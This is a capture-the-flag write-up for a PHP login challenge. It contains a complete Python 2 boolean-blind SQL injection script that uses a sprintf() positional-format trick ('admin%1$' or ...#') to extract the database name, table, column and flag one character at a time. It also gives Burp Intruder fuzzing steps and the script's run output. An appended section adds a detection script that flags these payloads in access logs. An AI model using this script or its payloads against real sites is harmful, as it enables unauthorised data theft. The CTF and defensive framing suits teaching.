"Celebrate Christmas, Win Big Prizes" challenge: SQLI

    0x01

    Knowledge required for this challenge:

    1. PHP sprintf() function vulnerability: https://blog.csdn.net/WQ_BCJ/article/details/85057447

    2. Boolean-based blind injection: basic payloads and workflow: https://blog.csdn.net/WQ_BCJ/article/details/84592445

    3. Burp Suite Intruder brute-force guessing: https://blog.csdn.net/snert/article/details/49749757

    4. Blind-injection Python (2) script:

    #coding:utf-8
    import requests
    import string

    def boom():
        url = r'http://10adf3af0baf4f6389bc0eed2495da87fd5e4464bed344e9.game.ichunqiu.com/'
        # A requests.Session keeps certain parameters (e.g. cookies) across requests: every
        # request sent through the same Session instance carries the same cookies, and
        # requests updates them automatically, which makes handling login cookies easy.
        s = requests.session()
        dic = string.digits + string.letters + "!@#$%^&*()_+{}-="
        right = 'password error!'   # response when the injected condition is true (user lookup succeeds)
        error = 'username error!'   # response when the injected condition is false
        lens = 0
        i = 0
        # Determine the length of the current database name
        while True:
            payload = "admin%1$\' or " + "length(database())>" + str(i) + "#"
            data = {'username': payload, 'password': 1}
            r = s.post(url, data=data).content
            if error in r:
                lens = i
                break
            i += 1
        print("[+]length(database()): %d" % (lens))
        # Determine the name of the current database, one character at a time
        # (substr() positions start at 1, so position 0 is skipped)
        strs = ''
        for i in range(1, lens + 1):
            for c in dic:
                payload = "admin%1$\' or " + "ascii(substr(database()," + str(i) + ",1))=" + str(ord(c)) + "#"
                data = {'username': payload, 'password': 1}
                r = s.post(url, data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
        print("[+]database():%s" % (strs))

        lens = 0
        i = 1
        # Length of the first table name in the current database
        while True:
            payload = "admin%1$\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"
            data = {'username': payload, 'password': 1}
            r = s.post(url, data=data).content
            if error in r:
                lens = i
                break
            i += 1
        print("[+]length(table): %d" % (lens))

        # Name of the first table
        strs = ''
        for i in range(1, lens + 1):
            for c in dic:
                # numbers must be converted with str() before they can be concatenated
                payload = "admin%1$\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
                data = {'username': payload, 'password': 1}
                r = s.post(url, data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
        print("[+]table_name:%s" % (strs))
        # Hex-encode the table name so it can be used in the query without quotes
        tablename = '0x' + strs.encode('hex')
        table_name = strs

        lens = 0
        i = 0
        # Length of the first column name in that table
        while True:
            payload = "admin%1$\' or " + "(select length(column_name) from information_schema.columns where table_name = " + tablename + " limit 0,1)>" + str(i) + "#"
            data = {'username': payload, 'password': 1}
            r = s.post(url, data=data).content
            if error in r:
                lens = i
                break
            i += 1
        print("[+]length(column): %d" % (lens))

        # Name of the first column
        strs = ''
        for i in range(1, lens + 1):
            for c in dic:
                payload = "admin%1$\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + tablename + " limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
                data = {'username': payload, 'password': 1}
                r = s.post(url, data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
        print("[+]column_name:%s" % (strs))
        column_name = strs

        num = 0
        i = 0
        # Number of rows in the table (printed under the label "number(column)")
        while True:
            payload = "admin%1$\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"
            data = {'username': payload, 'password': 1}
            r = s.post(url, data=data).content
            if error in r:
                num = i
                break
            i += 1
        print("[+]number(column): %d" % (num))

        lens = 0
        i = 0
        # Length of the value in the first row
        while True:
            payload = "admin%1$\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"
            data = {'username': payload, 'password': 1}
            r = s.post(url, data=data).content
            if error in r:
                lens = i
                break
            i += 1
        print("[+]length(value): %d" % (lens))

        # Read the value itself, one character at a time
        strs = ''
        for i in range(1, lens + 1):
            for c in dic:
                payload = "admin%1$\' or ascii(substr((select " + column_name + " from " + table_name + " limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"
                data = {'username': payload, 'password': '1'}
                r = s.post(url, data=data).content
                if right in r:
                    strs = strs + c
                    print strs
                    break
        print("[+]flag:%s" % (strs))

    if __name__ == '__main__':
        boom()
        print 'Finish!'

    0x02 Detailed solving procedure

    #1. From the challenge name "SQLI" we can guess that this is probably SQL injection.

    #2. Try weak passwords: with username=admin the site shows "password error" rather than "username error", so the username is admin.

    #3. Try the ordinary injection methods: https://blog.csdn.net/WQ_BCJ/article/details/85216275

         No result. Use Burp Suite's Intruder to find out which characters are not filtered; how to use it is described in the knowledge list above.

         Result of the brute force: comparing the response lengths, several abnormal lengths show that the % character is not filtered, and the response contains a sprintf() error ("too few arguments").

         We guess that sprintf() can be abused for injection; let's verify this below.

    #4. Entering username=admin%1$' and 1=1 # gives "username error"; replacing and with or gives "password error", which proves that the or 1=1 # after admin was executed successfully. Verification done; now it's blind-injection time:

    #5. Use the script to get the flag; the script and the basics of blind injection are described in detail in the knowledge list.

    D:Python2.7python2.exe F:/pycharm_work/sqli/sql.py
    [+]length(database()): 3
    c
    ct
    ctf
    [+]database():ctf
    [+]length(table): 4
    f
    fl
    fla
    flag
    [+]table_name:flag
    [+]length(column): 4
    f
    fl
    fla
    flag
    [+]column_name:flag
    [+]number(column): 1
    [+]length(value): 42
    f
    fl
    fla
    flag
    flag{
    flag{b
    flag{b5
    flag{b5b
    flag{b5b3
    flag{b5b36
    flag{b5b361
    flag{b5b3612
    flag{b5b36121
    flag{b5b36121-
    flag{b5b36121-8
    flag{b5b36121-86
    flag{b5b36121-86d
    flag{b5b36121-86dd
    flag{b5b36121-86dd-
    flag{b5b36121-86dd-a
    flag{b5b36121-86dd-a4
    flag{b5b36121-86dd-a4d
    flag{b5b36121-86dd-a4db
    flag{b5b36121-86dd-a4db-
    flag{b5b36121-86dd-a4db-a
    flag{b5b36121-86dd-a4db-aa
    flag{b5b36121-86dd-a4db-aab
    flag{b5b36121-86dd-a4db-aab3
    flag{b5b36121-86dd-a4db-aab3-
    flag{b5b36121-86dd-a4db-aab3-8
    flag{b5b36121-86dd-a4db-aab3-86
    flag{b5b36121-86dd-a4db-aab3-86d
    flag{b5b36121-86dd-a4db-aab3-86dd
    flag{b5b36121-86dd-a4db-aab3-86ddb
    flag{b5b36121-86dd-a4db-aab3-86ddb7
    flag{b5b36121-86dd-a4db-aab3-86ddb74
    flag{b5b36121-86dd-a4db-aab3-86ddb749
    flag{b5b36121-86dd-a4db-aab3-86ddb749d
    flag{b5b36121-86dd-a4db-aab3-86ddb749df
    flag{b5b36121-86dd-a4db-aab3-86ddb749dfa
    flag{自个做一遍去}
    
    Finish!
    
    Process finished with exit code 0
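As an added example (not part of the original write-up), the following shows how a defender could spot the two techniques used above in a login endpoint's access log: the printf positional specifier adjacent to a quote (the `%1$'` payload), the functions a boolean-blind probe relies on, and the enumeration pattern of many requests that differ only in a number. The log format, the rule names and the sample lines are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample access-log lines (client method path POST-body); not from the write-up.
SAMPLE_LOG = """\
10.0.0.5 POST /login username=admin&password=secret
10.0.0.7 POST /login username=admin%251%24%27+and+1%3D1+%23&password=1
10.0.0.7 POST /login username=admin%251%24%27+or+length%28database%28%29%29%3E0+%23&password=1
10.0.0.7 POST /login username=admin%251%24%27+or+length%28database%28%29%29%3E1+%23&password=1
10.0.0.7 POST /login username=admin%251%24%27+or+length%28database%28%29%29%3E2+%23&password=1
10.0.0.9 POST /login username=bob%40example.com&password=hunter2
"""

# A printf positional specifier (%<n>$) within two characters of a quote:
# the sprintf() trick from the write-up (%1$')
FORMAT_QUOTE = re.compile(r"%\d+\$.{0,2}['\"]")
# OR/AND followed by one of the functions boolean-blind probes rely on
BLIND_PROBE = re.compile(r"\b(?:or|and)\b.*\b(?:length|ascii|substr|substring)\s*\(", re.I)


def analyze(log_text, enum_threshold=3):
    """Return (client, rule, evidence) alerts for every suspicious login request."""
    alerts = []
    shapes = Counter()  # (client, path, username with digit runs masked) -> count
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, _method, path, body = line.split(" ", 3)
        # parse_qs percent-decodes and turns '+' into spaces, as the server would
        user = parse_qs(body, keep_blank_values=True).get("username", [""])[0]
        if FORMAT_QUOTE.search(user):
            alerts.append((client, "format-string-quote", user))
        if BLIND_PROBE.search(user):
            alerts.append((client, "boolean-blind-probe", user))
        shapes[(client, path, re.sub(r"\d+", "N", user))] += 1
    # Blind injection walks a counter: many requests identical except for a number
    for (client, path, shape), n in shapes.items():
        if n >= enum_threshold:
            alerts.append((client, "blind-enumeration", "%d requests to %s shaped %s" % (n, path, shape)))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Raising the enumeration threshold trades fewer false positives on ordinary retries for slower detection; the per-character loops in the script above issue dozens of such requests per extracted character.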
    
    Original article: https://www.cnblogs.com/qingwuyou/p/10687461.html